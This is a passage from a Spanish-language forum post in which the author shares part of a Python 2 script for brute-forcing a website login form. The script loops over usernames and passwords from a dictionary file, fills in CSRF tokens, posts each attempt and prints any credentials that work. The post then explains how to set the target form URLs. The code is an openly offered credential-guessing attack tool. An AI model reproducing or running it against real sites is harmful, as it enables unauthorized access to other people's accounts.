		for users in separar_datos:
 
			for passwords in separar_datos:
 
				if self.buscar_hash:
					datos_form = formulario.update({self.campo_usuario:users, self.campo_password:passwords, self.nombre_token:self.valor_token})
				else:
					datos_form = formulario.update({self.campo_usuario:users, self.campo_password:passwords})
 
				enviar_formulario = urllib2.urlopen(self.url_to_post, urllib.urlencode(formulario))
				if self.mensaje_error in enviar_formulario.read(): 
					print ".", 
				else:
					print "\nFound User:%s - Password:%s"%(users, passwords)
					sys.exit(1)
					cargar_diccionario.close()
 
bf = brute()

Le faltan mil cosas por pulir ... Luego lo pasaré para que lea parámetros por ARGV .

Para ingresar la URL del formulario deben editar la línea :

Código

self.url_form = "" # URL DEL FORMULARIO
self.url_to_post = "" # URL DONDE SE ENVIA EL FORM

Ojo, que a veces el formulario envía el POST al mismo archivo, pero no siempre ! .
Pido el URL del formulario para poder extraer los tokens previo envío , posteriormente, envío todos los datos a la URL que procesa los datos

Espero sea de su agrado.

Fuente : http://www.vodale.com/blog

Saludos, Javier.

Páginas: 1 [2] 3 4 5 6